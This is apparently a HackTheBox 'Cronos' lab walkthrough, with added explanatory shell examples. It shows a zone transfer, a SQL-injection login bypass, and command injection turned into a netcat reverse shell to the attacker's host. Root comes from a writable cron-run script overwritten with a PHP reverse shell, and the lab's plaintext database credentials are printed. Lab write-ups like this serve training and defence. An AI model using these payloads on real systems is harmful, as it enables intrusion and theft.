hackthebox cronos walkthrough

Starting with a full TCP port sweep using masscan over the VPN interface (tun0):

# masscan -e tun0 -p1-65535 10.10.10.13 --rate=1000

Starting masscan 1.0.6 (http://bit.ly/14GZzcT) at 2019-07-05 14:21:44 GMT
 -- forced options: -sS -Pn -n --randomize-hosts -v --send-eth
Initiating SYN Stealth Scan
Scanning 1 hosts [65535 ports/host]
Discovered open port 53/tcp on 10.10.10.13                                     
Discovered open port 22/tcp on 10.10.10.13                                     
Discovered open port 80/tcp on 10.10.10.13  

Port 53 is open, which is DNS. Let's see whether the name server allows a zone transfer (AXFR) of cronos.htb:

# dig axfr @10.10.10.13 cronos.htb

; <<>> DiG 9.11.4-2-Debian <<>> axfr @10.10.10.13 cronos.htb
; (1 server found)
;; global options: +cmd
cronos.htb.		604800	IN	SOA	cronos.htb. admin.cronos.htb. 3 604800 86400 2419200 604800
cronos.htb.		604800	IN	NS	ns1.cronos.htb.
cronos.htb.		604800	IN	A	10.10.10.13
admin.cronos.htb.	604800	IN	A	10.10.10.13
ns1.cronos.htb.		604800	IN	A	10.10.10.13
www.cronos.htb.		604800	IN	A	10.10.10.13
cronos.htb.		604800	IN	SOA	cronos.htb. admin.cronos.htb. 3 604800 86400 2419200 604800
;; Query time: 155 msec
;; SERVER: 10.10.10.13#53(10.10.10.13)
;; WHEN: Fri Jul 05 10:34:31 EDT 2019
;; XFR size: 7 records (messages 1, bytes 203)

The transfer reveals cronos.htb, admin.cronos.htb, ns1.cronos.htb and www.cronos.htb, all resolving to 10.10.10.13. Add them to /etc/hosts, without the trailing dot that dig prints (a "cronos.htb." entry in the hosts file will not match a lookup for cronos.htb):

10.10.10.13 cronos.htb admin.cronos.htb www.cronos.htb
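As an added example (not part of the original walkthrough), a small shell helper that turns the dig axfr output above into /etc/hosts lines, so a larger zone does not have to be copied by hand. The function name axfr_to_hosts is mine, and the inline sample is a constructed copy of the transfer above with the tabs replaced by spaces.

```shell
#!/bin/sh
# Added example, not from the original walkthrough: convert "dig axfr" output
# into /etc/hosts lines. Every A record's name is grouped under its address and
# the trailing dot of DNS notation is stripped, since "admin.cronos.htb." in
# /etc/hosts does not match a lookup of "admin.cronos.htb".

axfr_to_hosts() {
    # Field layout of a dig answer line: name ttl class type rdata.
    # Only A records matter for /etc/hosts; SOA, NS and ";" comment lines are skipped.
    awk '$4 == "A" {
            name = $1
            sub(/\.$/, "", name)
            if (!(name in seen)) {
                seen[name] = 1
                hosts[$5] = (hosts[$5] == "" ? name : hosts[$5] " " name)
            }
        }
        END { for (ip in hosts) print ip, hosts[ip] }'
}

# Constructed input: the records the transfer above returned, tabs as spaces.
SAMPLE_AXFR='cronos.htb.        604800 IN SOA cronos.htb. admin.cronos.htb. 3 604800 86400 2419200 604800
cronos.htb.        604800 IN NS  ns1.cronos.htb.
cronos.htb.        604800 IN A   10.10.10.13
admin.cronos.htb.  604800 IN A   10.10.10.13
ns1.cronos.htb.    604800 IN A   10.10.10.13
www.cronos.htb.    604800 IN A   10.10.10.13
cronos.htb.        604800 IN SOA cronos.htb. admin.cronos.htb. 3 604800 86400 2419200 604800'

# Against the live target:
#   dig axfr @10.10.10.13 cronos.htb | axfr_to_hosts | sudo tee -a /etc/hosts
printf '%s\n' "$SAMPLE_AXFR" | axfr_to_hosts
# prints: 10.10.10.13 cronos.htb admin.cronos.htb ns1.cronos.htb www.cronos.htb
```

Names are deduplicated, so a zone that lists the same name twice (as AXFR does for the SOA owner) still yields one hosts entry per name.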

Browse both domains. cronos.htb serves a Laravel page:

hackthebox – cronos – laravel (screenshot)

... and admin.cronos.htb presents a login form:

hackthebox – cronos – admin (screenshot)

Trying the usual default credentials (admin/admin, guest/guest and so on) gets nowhere, but a classic SQL injection in the username field works. Enter the following as the username; the password can be anything:

admin' OR 1=1 #

The single quote closes the username string literal, OR 1=1 makes the WHERE clause true for every row, and # (the MySQL comment marker) discards the rest of the query, including the password check. We are in:

hackthebox – cronos – net tool (screenshot)

The admin page is a small "net tool" that runs traceroute or ping against a host you supply. If the host is pasted straight into a shell command, a semicolon ends that command and starts ours. Try:

8.8.8.8; ls

This works: a directory listing comes back in the response, so we have command injection as the web server user.
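The page does not show the net tool's PHP, so here is an added shell model of the bug and of its fix, written for this edit rather than taken from the box. The vulnerable function builds a command string that a second shell parses; the hardened one allow-lists a dotted-quad IPv4 address and never hands the value to a shell. The function names (net_tool_vulnerable, is_ipv4, net_tool_hardened) are invented, and ping is replaced by echo so the block runs offline.

```shell
#!/bin/sh
# Added example; the box's PHP for the net tool is not on the page, so this is a
# shell model of the same bug and its fix. "ping" is replaced by "echo ping" so
# it runs offline; how the input is handled is what matters.

# Vulnerable pattern: the host goes into a command string that another shell
# parses, so ";" ends the ping command and whatever follows runs too.
# (In PHP this is the shape of shell_exec("ping -c 4 " . $_POST['host']).)
net_tool_vulnerable() {
    sh -c "echo ping -c 1 $1"
}

# Strict allow-list for a dotted-quad IPv4 address (hostnames would need their
# own check). Returns 0 if $1 is valid, 1 otherwise.
is_ipv4() {
    case "$1" in
        ''|*[!0-9.]*|.*|*.|*..*) return 1 ;;
    esac
    old_ifs=$IFS; IFS=.
    set -- $1
    IFS=$old_ifs
    [ "$#" -eq 4 ] || return 1
    for octet in "$@"; do
        [ "$octet" -le 255 ] || return 1
    done
    return 0
}

# Hardened pattern: validate first, then pass the value as a single argv element
# instead of through "sh -c", so metacharacters are never interpreted.
# (PHP equivalent: filter_var($host, FILTER_VALIDATE_IP) plus escapeshellarg().)
net_tool_hardened() {
    is_ipv4 "$1" || { echo "rejected: $1" >&2; return 1; }
    echo ping -c 1 "$1"
}

net_tool_vulnerable '8.8.8.8; echo INJECTED'   # second output line: INJECTED
net_tool_hardened '8.8.8.8; echo INJECTED' || echo "payload refused, as intended"
net_tool_hardened 8.8.8.8                      # ping -c 1 8.8.8.8
```

The validation alone is not the fix: passing the checked value as one argument, rather than re-assembling a command string, is what removes the shell from the picture.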

hackthebox – cronos – command injection (screenshot)

Let's turn that into a shell. Start a listener on the attacking machine first (nc -lvnp 4444), then submit the following instead of ls (the mkfifo netcat reverse shell; 10.10.14.44 is our VPN address):

8.8.8.8;rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc 10.10.14.44 4444 >/tmp/f

The listener receives a shell as www-data:

# nc -lvnp  4444
listening on [any] 4444 ...
connect to [10.10.14.44] from (UNKNOWN) [10.10.10.13] 44144
/bin/sh: 0: can't access tty; job control turned off
$ whoami
www-data

Upgrade the shell to a proper TTY with python -c 'import pty;pty.spawn("/bin/bash")' (the same trick used on the root shell further down), then look around. The admin application's database credentials sit in plain text:

www-data@cronos:/var/www/admin$ cat config.php
<?php
   define('DB_SERVER', 'localhost');
   define('DB_USERNAME', 'admin');
   define('DB_PASSWORD', 'kEjdbRigfBHUREiNSDs');
   define('DB_DATABASE', 'admin');
   $db = mysqli_connect(DB_SERVER,DB_USERNAME,DB_PASSWORD,DB_DATABASE);
?>
www-data@cronos:/var/www/laravel$ cat .env
APP_NAME=Laravel
APP_ENV=local
APP_KEY=base64:+fUFGL45d1YZYlSTc0Sm71wPzJejQN/K6s9bHHihdYE=
APP_DEBUG=true
APP_LOG_LEVEL=debug
APP_URL=http://localhost

DB_CONNECTION=mysql
DB_HOST=127.0.0.1
DB_PORT=3306
DB_DATABASE=homestead
DB_USERNAME=homestead
DB_PASSWORD=secret

www-data@cronos:/home$ ls
noulis

That gives two sets of database credentials (admin / kEjdbRigfBHUREiNSDs for the admin app, homestead / secret for Laravel) and a single local user, noulis. Note them, but the interesting find is in cron.

Looking around further, the system crontab (note the user column) has a job that root runs every minute:

* * * * *	root	php /var/www/laravel/artisan schedule:run >> /dev/null 2>&1

Checking the permissions, the script root executes is owned, and therefore writable, by www-data, the user we already are:

ls -lh /var/www/laravel/artisan
-rwxr-xr-x 1 www-data www-data 3.4K Jul  6 07:31 /var/www/laravel/artisan

So anything we write into artisan runs as root within a minute. Copy /usr/share/webshells/php/php-reverse-shell.php from Kali, set $ip to 10.10.14.44 and $port to 1234 inside it, write it over /var/www/laravel/artisan, start a listener on port 1234 and wait for the next run:

# nc -lvnp 1234
listening on [any] 1234 ...
connect to [10.10.14.44] from (UNKNOWN) [10.10.10.13] 33728
Linux cronos 4.4.0-72-generic #93-Ubuntu SMP Fri Mar 31 14:07:41 UTC 2017 x86_64 x86_64 x86_64 GNU/Linux
 18:40:01 up  3:45,  0 users,  load average: 0.00, 0.00, 0.00
USER     TTY      FROM             LOGIN@   IDLE   JCPU   PCPU WHAT
uid=0(root) gid=0(root) groups=0(root)
/bin/sh: 0: can't access tty; job control turned off
# python -c 'import pty;pty.spawn("/bin/bash")'
root@cronos:/# whoami
whoami
root
